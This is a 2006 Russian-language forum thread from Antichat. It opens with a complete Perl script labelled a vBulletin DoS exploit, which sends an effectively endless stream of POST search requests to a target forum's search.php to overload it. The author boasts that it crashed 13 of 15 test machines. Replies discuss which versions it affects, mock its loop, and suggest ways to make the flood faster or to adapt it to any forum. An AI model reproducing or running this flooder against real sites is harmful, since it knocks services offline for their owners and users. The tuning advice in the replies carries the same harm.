Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.11.2006, 13:51
|
|
Новичок
Регистрация: 07.07.2006
Сообщений: 5
Провел на форуме:
80247
Репутация:
1
|
|
VBulletin DoS Exploit
Код:
# VBulletin DoS Exploit by www.h4x0r.ir
#
# The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works ;)
#
# important => Image Verification in (search.php) is NOT Enabled.
# It works on 3.6.3 and prior [all] !
#
#Perl Script
use Socket;
if (ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)
{
$user="h4x0r".$rand.$i;
$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
print "\th4x0r Security Team\n";
print "\twww.h4x0r.ir\n\n";
exit(); };
Exploit By www.h4x0r.ir |
|
|
16.11.2006, 14:57
|
|
Новичок
Регистрация: 03.11.2006
Сообщений: 12
Провел на форуме:
33973
Репутация:
0
|
|
что под все версии катит штоли?
|
|
|
|
16.11.2006, 15:10
|
|
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831
Репутация:
1833
|
|
Сообщение от Kalowrat
что под все версии катит штоли?
Нет :
3.6.3
|
|
|
|
16.11.2006, 15:20
|
|
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567
Репутация:
354
|
|
ха ха ха, прикольно  |
|
|
|
16.11.2006, 15:31
|
|
Новичок
Регистрация: 03.11.2006
Сообщений: 12
Провел на форуме:
33973
Репутация:
0
|
|
хммм.. интересно как много в инете версий 3.6.3
))
|
|
|
|
16.11.2006, 16:25
|
|
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063
Репутация:
429
|
|
Мда, ваще гениальный сплойтенг умнее предумать они не догодались точно.
Таким же макаром у любого форума и в любом месте можно базу снести на время, делать щоль им нехер блин.
|
|
|
|
16.11.2006, 16:28
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541
Репутация:
761
|
|
>for ($i=0; $i<99999999999999999999999999999999999999999999999 999
Гениально
Только одно не понятно - почему Exploit? Под сплойтом вроде как понимается повышение привелегий. Досер он и в африке досер. Кто-то выкладывал досер панББ, так небольшие модификауии и можно досеры под все форумы зарубить....
|
|
|
|
16.11.2006, 16:42
|
|
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063
Репутация:
429
|
|
Флудер и все, максимум как можно назвать это чудо, а по данной технологии частенько и досят сайт хотя досом назвать не легко.
|
|
|
|
16.11.2006, 20:44
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
for ($i=0; $i<99999999999999999999999999999999999999999999999 999 99999999999999999999; $i++)
убийцы.. это не POST ddoser уже.. и написать такой можно для любого форума )
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
16.11.2006, 22:59
|
|
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315
Репутация:
1228
|
|
ну есле уж на то пошло:
Код:
for ($i=0; $i<99999999999999999999999999999999999999999999999999 99999999999999999999; $i++)
не прощи ли написать while(1)
Сообщение от _-[A.M.D]HiM@S-_
Нет :
3.6.3
а помоему под любую подогнать можно))
и строки:
Код:
$data = "s=&do=process&query=$user&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate=1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
можно за цикл вынести, "быстрее" будет
Последний раз редактировалось nc.STRIEM; 16.11.2006 в 23:05..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для _-[A.M.D]HiM@S-_](/avatars/avatar21104.jpg?224576){kind=avatar}
Похожие темы
Линейный вид
